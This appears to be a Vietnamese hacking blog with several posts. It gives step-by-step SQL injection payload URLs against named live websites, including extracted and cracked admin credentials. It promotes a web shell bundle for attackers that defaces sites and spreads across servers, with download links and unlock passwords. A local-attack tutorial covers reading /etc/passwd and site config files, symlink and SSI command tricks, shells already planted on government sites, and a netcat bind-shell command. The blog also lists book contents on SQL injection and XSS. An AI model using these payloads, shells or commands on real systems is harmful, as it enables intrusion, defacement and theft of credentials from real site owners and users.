[Source] Wall script 4.0

For installation follow this link.

http://www.9lessons.info/2011/10/fac...0-release.html

Database design for friends relations

http://www.9lessons.info/2010/04/dat...ables-and.html

Video:

Link Down

http://www.mediafire.com/?jud35c7ckx83rap

[Source] Wall script 4.0

By: MIN Software on: 1:42 AM

[TUT] - SQL http://phim.haylem.net (fake HTML)

Cũng là Rewrite đuôi thành HTML.

Tutorial:

Get version
http://phim.haylem.net/the-loai/Hanh...7e,version())) and 'a'='a/page-1.html

Get table
http://phim.haylem.net/the-loai/Hanh...se()+limit+0,1 ))) and 'a'='a/page-1.html
Thay limit 0,1 bởi limit 1,1 ..... limit 12,1 ta được tất cả table

Get column
http://phim.haylem.net/the-loai/Hanh...6572+limit+2,1 ))) and 'a'='a/page-1.html

Get data admin
http://phim.haylem.net/the-loai/Hanh...user+limit+0,1 ))) and 'a'='a/page-1.html

Ta được: 

admin|b56f4ab266bd60dc6e8ff73ed

[TUT] - SQL http://phim.haylem.net (fake HTML)

By: MIN Software on: 1:32 AM

[TUT] - SQL http://gametienlen.net (fake HTML)

Site này rewrite domain thành .html chứ thực ra là ASPX

Tutorial:

Get version
http://gametienlen.net/gameonline/GA...t,@@VERSION)-- -.html

Get data
http://gametienlen.net/gameonline/GA...t,DB_NAME())-- -.html

Get table
Table đầu tiên
http://gametienlen.net/gameonline/GA...chema.tables)) -- -.html
http://gametienlen.net/gameonline/GA..._Schema.tables +where+table_name+not+in('tb_user_group'))) -- -.html

Tất cả các table
http://gametienlen.net/gameonline/GA..._Schema.tables +where+table_name+not+in('tb_account' ,'tb_quangcao','tb_comment','tb_game_phone_type',' tb_thanhvien','tb_user_group')))-- -.html

Get column của 'tb_account'
Column đầu tiên
http://gametienlen.net/gameonline/GA...#39;tb_account ')) -- -.html

Column user va pass
http://gametienlen.net/gameonline/GA...#39;tb_account ' +and+column_name+not+in+('pass' ,'username','id_email','id_account'))) -- -.html

Get username
http://gametienlen.net/gameonline/GAME_AVATAR'+and 1=convert(int,(select top 1 username from tb_account)) -- -.html

Get password
http://gametienlen.net/gameonline/GAME_AVATAR'+and 1=convert(int,(select top 1 pass from tb_account)) -- -.html

Cuối cùng ta được:

admin|4438FC033F8AEF433F9DB5348B70E8E5

Crack pass đơn giản:

admin|123698745

[TUT] - SQL http://gametienlen.net (fake HTML)

By: MIN Software on: 1:31 AM

[Testing] VNHack's Shell - The Best Shell for Attacker

/*=================================*\

|| ##################################### ||

|| #        Code by Juno_okyo - 29/07/2012         # ||

|| #      VNHack Group - wWw.VNHack.Us      # ||

|| ##################################### ||

\*=================================*/

Sau 2 ngày thức trắng ngồi viết code thì giờ cũng đã gần hoàn thành con shell VNHack v1.0 :D

Giờ làm cái clip giới thiệu, chưa hoàn chỉnh nên chưa pub luôn, mọi người xem demo và góp ý kiến để mình hoàn thiện shell nhé!
Mở 1 tab Youtube mà xem HD720 nhé :D Chức năng:

• Giao diện đơn giản: 1 menu khởi tạo shell bên trên, 1 taskbar hỗ trợ Attacker bên dưới, ở giữa là frame load shell được tạo ra.
• Khi run shell lập tức tự tạo ra vnhack.html (deface) + vnh.php (upload code) dự phòng.
• Khi khởi tạo hết tất cả các shell: gồm ~10 shell + zip.php (để ZIP code) + vnhack.html + vnh.php. Trong đó mỗi shell đc tạo ra từ vnhack.php lại nằm trong 1 folder riêng theo thứ tự tăng dần: vnh-0...

Danh sách shell con của vnhack.php (khi khởi tạo từ menu bên trên) gồm:

1. Shell Forcer
2. C99 Chip (dev từ C99)
3. MadspotShell
4. Symlink SA 2.0
5. Priv8 Shell
6. MuiCiShell (chức năng lây lan toàn server, nếu server config kém)
7. iTSecTeam Shell
8. XgR Shell
9. ZIP Code (zip.php)
10. Bypass SafeMode (via .htaccess, php.ini & ini.php)

Và vài chức năng hỗ trợ Local Attack ở Taskbar bên dưới:

1. Reverse IP
2. Whois
3. Shells (cung cấp shell tại http://r57.gen.tr/)
4. Tools (Tools tại http://tools.sinhvienit.net/)
5. MD5 (code by Juno_okyo)
6. Convert Hex <<<===>>> ASII

Một vài hình ảnh demo VNHack's Shell:   1 - Khi chưa run shell - chỉ có vnhack.php   2 - Run shell - giao diện đơn giản, ko rối mắt, với các button sử dụng CSS + khung viền xanh (nhìn giao diện rất "hắc cờ")   3 - Sau khi run vnhack.php thì 2 file khác cùng folder với shell được tạo ra:   4 - Khởi tạo shell Forcer (code gốc, nhiều người vẫn nghĩ code gốc là byg.php :T):    5 - Khởi tạo C99 Chip (develop từ c99, khá ngon, Việt hóa 99%, thích hợp cho Newbie)   6 - Symlink SA 2.0 (bypass via Symlink Root)   7 - Priv8.php (Shell của Izo) <<< đây chính là ý tưởng Juno thực hiện VNHack's Shell. Priv8 tự tạo các shell con và nhiều phương thức Backconnect. Con này thì nhiều bạn biết rồi   8 - Khởi tạo XgR Shell (Xgroup Shell) <<< develop từ R57   9 - Zip.php <<< dùng để ZIP code victim - con này được tạo ra cùng folder với vnhack.php   10 - Một chức năng ở Taskbar bên dưới: MD5 <<< code by Juno luôn   11 - Và đây là hình ảnh sau khi khởi tạo hết shell con của vnhack.php   Download Full "VNHack's Shell v1.0 - The Best Shell for Attacker.rar":

http://www.mediafire.com/?qctidd6n0s11cyd

Pass Unlock: vnhack

[Testing] VNHack's Shell - The Best Shell for Attacker

By: MIN Software on: 12:20 AM

Tấn công và Phòng thủ trong SQL Injection

What Is SQL Injection?
1-Introduction
2-Understanding How Web Applications Work.
3-A Simple Application Architecture
4-A More Complex Architecture
5-Understanding SQL Injection
6-High-Profile Examples
7-Understanding How It Happens
8-Dynamic String Building
9-Incorrectly Handled Escape Characters
10-Incorrectly Handled Types
11-Incorrectly Handled Query Assembly
12-Incorrectly Handled Errors
13-Incorrectly Handled Multiple Submissions
14-Insecure Database Configuration
15-Summary
16-Solutions Fast Track
17-Frequently Asked Questions


Testing for SQL Injection
1-Introduction
2-Finding SQL Injection
3-Testing by Inference
4-Identifying Data Entry
5-GET Requests
6-POST Requests
7-Other Injectable Data
8-Manipulating Parameters
9-Information Workf low
10-Database Errors
11-Commonly Displayed SQL Errors
12-Microsoft SQL Server Errors
13-MySQL Errors
14-Oracle Errors
15-Generic Errors
16-HTTP Code Errors
17-Different Response Sizes
18-Blind Injection Detection
19-Confirming SQL Injection
20-Differentiating Numbers and Strings
21-Inline SQL Injection
22-Injecting Strings Inline
23-Injecting Numeric Values Inline
24-Terminating SQL Injection
25-Database Comment Syntax
26-Using Comments
27-Executing Multiple Statements
28-Time Delays
29-Automating SQL Injection Discovery
30-Tools for Automatically Finding SQL Injection
31-HP WebInspect
32-IBM Rational AppScan
33-HP Scrawlr
34-SQLiX
35-Paros Proxy
36-Summary
37-Solutions Fast Track
38-Frequently Asked Questions


Reviewing Code for SQL Injection

1-Introduction
2-Reviewing Source Code for SQL Injection
3-Dangerous Coding Behaviors
4-Dangerous Functions
5-Following the Data
6-Following Data in PHP
7-Following Data in Java
8-Following Data in C#
9-Reviewing PL/SQL and T-SQL Code
10-Automated Source Code Review
11-Yet Another Source Code Analyzer
12-Pixy
13-AppCodeScan
14-LAPSE
15-Security Compass Web Application Analysis Tool (SWAAT)
16-Microsoft Source Code Analyzer for SQL Injection
17-Microsoft Code Analysis Tool .NET (CAT.NET)
18-Commercial Source Code Review Tools
19-Ounce
20-Source Code Analysis
21-CodeSecure
22-Summary
23-Solutions Fast Track
24-Frequently Asked Questions


Exploiting SQL Injection

1-Introduction
2-Understanding Common Exploit Techniques
3-Using Stacked Queries
4-Identifying the Database
5-Non-Blind Fingerprint
6-Banner Grabbing
7-Blind Fingerprint
8-Extracting Data through UNION Statements
9-Matching Columns
10-Matching Data Types
11-Using Conditional Statements
12-Approach 1: Time-based
13-Approach 2: Error-based
14-Approach 3: Content-based
15-Working with Strings
16-Extending the Attack
17-Using Errors for SQL Injection
18-Error Messages in Oracle
19-Enumerating the Database Schema
20-SQL Server
21-MySQL
22-Oracle
23-Escalating Privileges
24-SQL Server
25-Privilege Escalation on Unpatched Servers
26-Oracle
27-Stealing the Password Hashes
28-SQL Server
29-MySQL
30-Oracle
31-Oracle Components
32-APEX
33-Oracle Internet Directory
34-Out-of-Band Communication
35-E-mail
36-Microsoft SQL Server
37-Oracle
38-HTTP/DNS
39-File System
40-SQL Server
41-MySQL
42-Oracle
43-Automating SQL Injection Exploitation
44-Sqlmap
45-Sqlmap Example
46-Bobcat
47-BSQL
48-Other Tools
49-Summary
50-Solutions Fast Track
51-Frequently Asked Questions


Blind SQL Injection Exploitation


1-Introduction
2-Finding and Confirming Blind SQL Injection
3-Forcing Generic Errors
4-Injecting Queries with Side Effects
5-Spitting and Balancing
6-Common Blind SQL Injection Scenarios
7-Blind SQL Injection Techniques
8-Inference Techniques
9-Increasing the Complexity of Inference Techniques
10-Alternative Channel Techniques
11-Using Time-Based Techniques
12-Delaying Database Queries
13-MySQL Delays
14-Generic MySQL Bit-by-Bit Inference Exploits
15-SQL Server Delays
16-Generic SQL Server Binary Search Inference Exploits
17-Generic SQL Server Bit-by-Bit Inference Exploits
18-Oracle Delays
19-Time-Based Inference Considerations
20-Using Response-Based Techniques
21-MySQL Response Techniques
22-SQL Server Response Techniques
23-Oracle Response Techniques
24-Returning More Than One Bit of Information
25-Using Alternative Channels
26-Database Connections
27-DNS Exfiltration
28-E-mail Exfiltration
29-HTTP Exfiltration
30-Automating Blind SQL Injection Exploitation
31-Absinthe
32-BSQL Hacker
33-SQLBrute
34-Sqlninja
35-Squeeza
36-Summary
37-Solutions Fast Track
38-Frequently Asked Questions


Exploiting the Operating System

1-Introduction
2-Accessing the File System
3-Reading Files
4-MySQL
5-Microsoft SQL Server
6-Oracle
7-Writing Files
8-MySQL
9-Microsoft SQL Server
10-Oracle
11-Executing Operating System Commands
12-Direct Execution
13-Oracle
14-DBMS_SCHEDULER
15-PL/SQL Native
16-Other Possibilities
17-Alter System Set Events
18-PL/SQL Native 9i
19-Buffer Overflows
20-Custom Application Code
21-MySQL
22-Microsoft SQL Server
23-Consolidating Access
24-Summary
25-Solutions Fast Track
26-Frequently Asked Questions
27-Endnotes


Advanced Topics

1-Introduction
2-Evading Input Filters
3-Using Case Variation
4-Using SQL Comments
5-Using URL Encoding
6-Using Dynamic Query Execution
7-Using Null Bytes
8-Nesting Stripped Expressions
9-Exploiting Truncation
10-Bypassing Custom Filters
11-Using Non-Standard Entry Points
12-Exploiting Second-Order SQL Injection
13-Finding Second-Order Vulnerabilities
14-Using Hybrid Attacks
15-Leveraging Captured Data
16-Creating Cross-Site Scripting
17-Running Operating System Commands on Oracle
18-Exploiting Authenticated Vulnerabilities
19-Summary
20-Solutions Fast Track
21-Frequently Asked Questions

Code-Level Defenses

1-Introduction
2-Using Parameterized Statements
3-Parameterized Statements in Java
4-Parameterized Statements in .NET (C#)
5-Parameterized Statements in PHP
6-Parameterized Statements in PL/SQL
7-Validating Input
8-Whitelisting
9-Blacklisting
10-Validating Input in Java
11-Validating Input in .NET
12-Validating Input in PHP
13-Encoding Output
14-Encoding to the Database
15-Encoding for Oracle
16-Oracle dbms_asser
17-Encoding for Microsoft SQL Server
18-Encoding for MySQL
19-Canonicalization
20-Canonicalization Approache
21-Working with Unicode
22-Designing to Avoid the Dangers of SQL Injection
23-Using Stored Procedures
24-Using Abstraction Layers
25-Handling Sensitive Data
26-Avoiding Obvious Object Names
27-Setting Up Database Honeypots

Reference

1-Introduction
2-Structured Query Language (SQL) Primer
3-SQL Queries
4-SELECT Statement
5-UNION Operator
6-INSERT Statement
7-UPDATE Statement
8-DELETE Statement
9-DROP Statement
10-CREATE TABLE Statement
11-ALTER TABLE Statement
12-GROUP BY Statement
13-ORDER BY Clause
14-Limiting the Result Set
15-SQL Injection Quick Reference
16-Identifying the Database Platform
17-Identifying the Database Platform via Time Delay Inference
18-Identifying the Database Platform via SQL Dialect Inference
19-Combining Multiple Rows into a Single Row
20-Microsoft SQL Server Cheat Sheet.
21-Blind SQL Injection Functions: Microsoft SQL Server
22-Microsoft SQL Server Privilege Escalation
23-OPENROWSET Reauthentication Attack
24-Attacking the Database Server: Microsoft SQL Server
25-System Command Execution via xp_cmdshell
26-xp_cmdshell Alternative
27-Cracking Database Passwords
28-Microsoft SQL Server 2005 Hashes
29-File Read/Write
30-MySQL Cheat Sheet
31-Enumerating Database Configuration Information and Schema
32-Blind SQL Injection Functions: MySQL
33-Attacking the Database Server: MySQL
34-System Command Execution
35-Cracking Database Passwords
36-Attacking the Database Directly
37-File Read/Write
38-Oracle Cheat Sheet
39-Enumerating Database Configuration Information and Schema
40-Blind SQL Injection Functions: Oracle
41-Attacking the Database Server: Oracle
42-Command Execution
43-Reading Local Files
44-Reading Local Files (PL/SQL Injection Only)
45-Writing Local Files (PL/SQL Injection Only)
46-Cracking Database Passwords
47-Bypassing Input Validation Filters
48-Quote Filters
49-HTTP Encoding
50-Troubleshooting SQL Injection Attacks
51-SQL Injection on Other Platforms
52-PostgreSQL Cheat Sheet
53-Enumerating Database Configuration Information and Schema
54-Blind SQL Injection Functions: PostgreSQL
55-Attacking the Database Server: PostgreSQL
56-System Command Executio
57-Local File Access
58-Cracking Database Passwords
59-DB2 Cheat Sheet
60-Enumerating Database Configuration Information and Schema
61-Blind SQL Injection Functions: DB2
62-Informix Cheat Sheet
63-Enumerating Database Configuration Information and Schema
64-Blind SQL Injection Functions: Informix
65-Ingres Cheat Sheet
66-Enumerating Database Configuration Information and Schema
67-Blind SQL Injection Functions: Ingres
68-Microsoft Access
69-Resources
70-SQL Injection White Papers
71-SQL Injection Cheat Sheets
72-SQL Injection Exploit Tools
73-Password Cracking Tools
74-Solutions Fast Track

Download :
http://www.mediafire.com/?359ldesiai4154a

Tấn công và Phòng thủ trong SQL Injection

By: MIN Software on: 8:02 PM

[TUT] Upload Shell Image kết hợp Live HTTP và PHTML

Victim + Shell + TUT:

 http://www.mediafire.com/?8rav8sd93x3sjaw

Pass Unlock:

vnhack

Enjoy!

[TUT] Upload Shell Image kết hợp Live HTTP và PHTML

By: MIN Software on: 1:00 AM

Tấn công và Phòng thủ trong XSS

Chapter 1 Cross-site Scripting Fundamentals
1-Introduction
2-Web Application Security
3-XML and AJAX Introduction
4-Summary
5-Solutions Fast Track
6-Frequently Asked Questions

Chapter 2 The XSS Discovery Toolkit
1-Introduction
2-Burp
3-Debugging DHTML With Firefox Extensions
4-DOM Inspector
5-Web Developer Firefox Extension
6-Insert Edit HTML Picture
7-XSS Example in Web Developer Web Site
8-FireBug
9-Analyzing HTTP Traffic with Firefox Extensions
10-LiveHTTPHeaders
11-ModifyHeaders
12-TamperData
13-GreaseMonkey
14-GreaseMonkey Internals
15-Creating and Installing User Scripts
16-PostInterpreter
17-XSS Assistant
18-Active Exploitation with GreaseMonkey
19-Hacking with Bookmarklets
20-Using Technika
21-Summary
22-Solutions Fast Track
23Frequently Asked Questions

Chapter 3 XSS Theory
1-Introduction
2-Getting XSS’ed
3-Non-persistent
4-DOM-based
5-Persistent
6-DOM-based XSS In Detail
7-Identifying DOM-based XSS Vulnerabilities
8-Exploiting Non-persistent
9-DOM-based XSS Vulnerabilities
10-Exploiting Persistent DOM-based XSS Vulnerabilities
11-Preventing DOM-based XSS Vulnerabilities
12-Redirection
13-Redirection Services
14-Referring URLs
15-CSRF
16Flash, QuickTime, PDF, Oh My
17-Backdooring Image Files
19-HTTP Response Injection
20-Source vs. DHTML Reality
21-Bypassing XSS Length Limitations
22-XSS Filter Evasion
23-When Script Gets Blocked
24-Browser Peculiarities
25-CSS Filter Evasion
26-XML Vectors
27-Attacking Obscure Filters
28-Encoding Issues
29-Summary
30-Solutions Fast Track
31-Frequently Asked Questions
32-Playing with Flash Fire
33-Hidden PDF Features
34-QuickTime Hacks for Fun and Profit
35-Backdooring Image Files
36HTTP Response Injection

Chapter 4 XSS Attack Methods
1-Introduction
2-History Stealing
3-JavaScript/CSS API “getComputedStyle”
4-Code for Firefox/Mozilla. May
5-Work In Other Browsers
6-Stealing Search Engine Queries
7-JavaScript Console Error Login Checker
8-Intranet Hacking
9-Exploit Procedures
10-Persistent Control
11-Obtaining NAT’ed IP Addresses
12-Port Scanning
13-Blind Web Server Fingerprinting
14-Attacking the Intranet
15-XSS Defacements
16-Summary
17-Solutions Fast Track
18-Frequently Asked Questions
19-References

Chapter 5 Advanced XSS Attack Vectors
1-Introduction
2-DNS Pinning
3-Anti-DNS Pinning
4-Anti-Anti-DNS Pinning
5-Anti-anti-anti-DNS Pinning
6-AKA Circumventing Anti-anti-DNS Pinning
7-Additional Applications of Anti-DNS Pinning
8-IMAP3
9-MHTML
10-Expect Vulnerability
11-Hacking JSON
12-Summary
13-Frequently Asked Questions

Chapter 6 XSS Exploited
1-Introduction
2-XSS vs. Firefox Password Manager
3-SeXXS Offenders
4-Equifraked
5-Finding the Bug
6-Building the Exploit Code
7-Owning the Cingular Xpress Mail User
8-The Xpress Mail Personal Edition Solution
9-The Ackid (AKA Custom Session ID)
10-The Inbox
11-The Document Folder
12-E-mail Cross-linkage
13-CSFR Proof of Concepts
14-Cookie Grab
15-Xpressmail Snarfer
16-Owning the Documents
17-Alternate XSS: Outside the BoXXS
18-Owning the Owner
19-The SILICA and CANVAS
20-Building the Scripted Share
21-Owning the Owner
22-Lessons Learned and Free Advertising
23-Airpwned with XSS
24-XSS Injection: XSSing Protected Systems
25-The Decompiled Flash Method
26-Application Memory Massaging –XSS via an Executable
27-XSS Old School - Windows Mobile PIE 4.2
28-Cross-frame Scripting Illustrated
29-XSSing Firefox Extensions
30-GreaseMonkey Backdoors
31-GreaseMonkey Bugs
32-XSS the Backend: Snoopwned
33-XSS Anonymous Script Storage - TinyURL 0day
34-XSS Exploitation: Point-Click-Own with EZPhotoSales
35-Summary
36-Solutions Fast Track
37-Frequently Asked Questions

Chapter 7 Exploit Frameworks
1-Introduction
2-AttackAPI
3-Enumerating the Client
4-Attacking Networks
5-Hijacking the Browser
6-Controlling Zombies
7-BeEF
8-Installing and Configuring BeEF
9-Controlling Zombies
10-BeEF Modules
11-Standard Browser Exploits
12-Port Scanning with BeEF
13-Inter-protocol Exploitation and Communication with BeEF
14-CAL9000
15-XSS Attacks, Cheat Sheets, and Checklists
16-Encoder, Decoders, and Miscellaneous Tools
17-HTTP Requests/Responses and Automatic Testing
18-Overview of XSS-Proxy
19-XSS-Proxy Hijacking Explained
20-Browser Hijacking Details
21-Attacker Control Interface
22-Using XSS-Proxy: Examples
23-Setting Up XSS-Proxy
24-Setting Up XSS-Proxy
25-Injection and Initialization Vectors For XSS-Proxy
26-Handoff and CSRF With Hijacks
27-Sage and File:// Hijack With Malicious RSS Feed
28-Summary
29-Solutions Fast Track
30-Frequently Asked Questions

Chapter 8 XSS Worms
1-Introduction
2-Exponential XSS
3-XSS Warhol Worm
4-Linear XSS Worm
5-Samy Is My Hero
6-Summary
7-Solutions Fast Track
8-Frequently Asked Questions

Chapter 9 Preventing XSS Attacks
1-Introduction
2-Filtering
3-Input Encoding
4-Output Encoding
5-Web Browser’s Security
6-Browser Selection
7-Add More Security To Your Web Browser
8-Disabling Features
9-Use a Virtual Machine
10-Don’t Click On Links in E-mail, Almost Ever
11-Defend your Web Mail
12-Beware of Overly Long URL’s
13-URL Shorteners
14-Secrets Questions and Lost Answers
15-Summary
16-Solutions Fast Track
17-Frequently Asked Questions

Download
http://www.mediafire.com/?5ktpvb68dvq1xvi

Tấn công và Phòng thủ trong XSS

By: MIN Software on: 9:48 PM

Code Tạo Giấy Chứng Nhận Kết Hôn

Demo:

http://nguoibimson.vn/kethon/

Download:

http://www.mediafire.com/?aai2rlw03mub77d

Password Unlock:

junookyo

Code Tạo Giấy Chứng Nhận Kết Hôn

By: MIN Software on: 11:30 AM

Các Phương Pháp Local Attack

Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ: Giới thiệu tính năng 1 số shell

      


  *        Nhắc lại trình tự các bước Local Attack

     1-       View danh sách các user trong server

     2-      Tìm  file config.php

     3-      Get thông tin login vào database

     4-      Crack hoặc change pass admin

     5-      Login vào quyên quản trị và upshell

    

     1-      View danh sách các user trên server

Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, từ đó tìm cách đọc file config.php của user đó.

-          Một số câu lệnh để get user:

Lệnh phổ biến nhất:

Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd

./cat/etc/passwd

More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:

http://www.mediafire.com/?gic70c6ce441333

http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)

http://www.mediafire.com/?2rk42hiv9b4ii3f

Pass download: soleil_vhb

Pass dải nén: ceh.vn

 -          Câu lênh get user & domain

Cat /etc/virtual/domainowners

               

      2-      Tìm file path file config.php

Đối với các mã nguồn mở thì path file config được mặc định như sau:

Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

-          Vbulletin:

path/includes/config.php

-          Mybb:

path/inc/config.php

-          Joomla:

path/configuration.php

-          Word-Press:

path/wp-config.php

-          Ibp:

path/conf_global.php

-          Php-fusion:

path/config.php

-          Smf:

Path/Settings.php

-          Nuke:

path/config.php

-          Xoops:

path/mainfile.php

-          Zen Cart

Path/includes/configure.php

-          path/setidio:

path/datas/config.php

-          Datalife Engine:

path/engine/data/config.php

-          Phpbb:

Path/config.php

-          Wordpress:

path/wp-config.php

-          Seditio:

path/datas/config.php

-          Drupal:

path/sites/default/settings.php

-          Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php ).

-          Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ dò path file config đối với vbulletin chẳng hạn:

Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php

( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . '/includes/init.php');” -  Đây là path mặc định dẫn tới file init.php))……

     3-      Get thông tin file config 

Phần này chính là phần trọng tâm nhất trong  bộ tut local attack. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.

3.1-  Trước hết ta cần tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attck:

-          Ls , dir       : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục

Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php

-          Cat, ./cat, less, more, tail :  View nôi dung bên trong các file:

Cat /home/vhbgroup/public_html/@4rum/includes/config.php

-          Ln : Lệnh symbolic link:

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.phpsoleil.ini

-          Cd: Chuyển đổi thư mục

Ví dụ muốn chuyển tới thư mục soleil”

Cd /home/vhbgroup/public_html/@4rum/includes/soleil

cd ~ : Tới thư mục home dictionary

cd -:  Quay lại thư mục vừa làm việc

cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc

-          Chmod: Phân quyền cho các file hoặc thư mục:

Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )

-          Mkdir: tạo thư mục:

Ví du muốn tạo thư mục soleil trong thư mục includes:

Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil 

-          Touch : Tạo file:

touch /home/vhbgroup/public_html/@4rum/includes/soleil.php 

-          Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root

Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)

Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)

Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)

Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)

…………

3.2- Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php

    1-      Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.

Ví dụ:

dir /home/vhbgroup/public_html/includes

cat /home/vhbgroup/public_html/includes/config.php

Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi

     2-      Sử dụng Symbolic link – Gọi tắt là symlink

Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.phpsoleil.ini

Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path /home/vhbgroup/public_html/@4rum/includes/config.php

Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.

     3-      Sử dụng symlink kết hợp với ssi:

Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.

-          Tạo 1 file ducdung08clc.shtml với nội dung như sau:

<!--#include virtual="soleil.ini"-->

Trong đó file soleil.ini là file đã được symbolic link trên server.

Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.

     4-      Chạy lệnh bằng file .shtml

-          Tuy nhiên  có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml

<!--#exec cmd="cat /etc/passwd"-->

-          Lệnh xem file logs như sau:

<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->

Lưu ý:  + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.

 +  /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin

           + Còn path dẫn đến file error.log của cpanel là:  /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.

     5-      Get all config toàn server

       -          Đâu tiên download shell get all config ( w.php)  về rồi up lên server.

http://www.mediafire.com/?hi4gnmu3kpxn095  ( pass unlock: soleil_vhb )

      -          Click vào done và thư mục có tên là tmp sẽ được tạo ra.

      -          Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:

+             dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).

+             user.sa : Shell này dung để xem danh sách các user và domain trên server.

+             config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink

      -          Vào link shell  http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa

 

      -          Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn  “get config”

     -          Cuối cùng trở lại link http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ có được danh sách các file config của các site trên server.

 *   Đặc điểm của con shell get all config này:

+             Là 1 công cụ cực kỳ thuận tiện, giảm bớt thời gian và công sức khi local attack

+             Chỉ sử dụng đối với các server cho chạy shell cgi và cho quyền symlink

+             Không bypass được, chỉ symlink đối với các site chưa chmod và có path dẫn đến file config là mặc định.

      6-      Symbolink Root:

-          Download file r00t.tar.gz về và upload lên host:

http://www.mediafire.com/?21kycoh4g5s4ojo  (pass download: soleil_vhb, pass dải nén: ceh.vn)

-          Sau đó giải nén file root.tar.gz, sử dụng lệnh sau:

Tar –zxvf r00t.tar.gz

-          Up file .htacess  cùng thư mục với file r00t:

Options all

DirectoryIndex Sux.html

AddType text/plain .php

AddHandler server-parsed .php

AddType text/plain .html

AddHandler txt .html

Require None

Satisfy Any

-          Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shell

Demo:

http://tnmthatinh.gov.vn/soleil/r00t/

Và đây là cấu trúc của trường http://cdhh.edu.vn/

http://tnmthatinh.gov.vn/soleil/r00t/home/cdhh/public_html/

      7-      Backconnet:

Có thể hiểu đơn giản là kết nối bằng cổng sau, nghĩa là sử dụng shell backconnet và tool netcat (nc.exe) để mở sẵn 1 cổng trên server, sau đó từ máy tính của attacker kết nối với server qua cổng đã được mở sẵn đó. Mọi câu lệnh thực thi đối với server có thể thực hiện trên máy tính của attacker qua command line.

Đồ nghề cần thiết:

-          Tool netcat (nc.exe)

http://www.mediafire.com/?npsob8c7dd9nr40

-          Shell back connect đối với asp:

http://www.mediafire.com/?etciiuskzvyhjcw

Chú ý, trong shell có 1 đoạn code như: "G:\domains\tvled.vn\wwwroot\austdoor\design\nc.exe -l -p 1234 -e cmd.exe -d"

Lúc up shell lên  cần edit lại “G:\domains\tvled.vn\wwwroot\austdoor\design\” thành path của server dẫn tới file nc.exe.

-          Shell backconnet đối với php

http://www.mediafire.com/?8o1sj35cs51lsiw

( Pass unlock soleil_vhb; Pass dải nén: ceh.vn )

-          Download tool nc.exe rồi đặt trong ổ C chẳng hạn, sau đó mở cửa sổ command line và sử dụng netcat để mở cổng trên local host kết nối với server đã mở sẵn cổng

-          Cú pháp:  +  chế độ kết nối    : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
                  + chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]

Một số câu lệnh có thể sử dụng:

nc -nvv -l -p 80

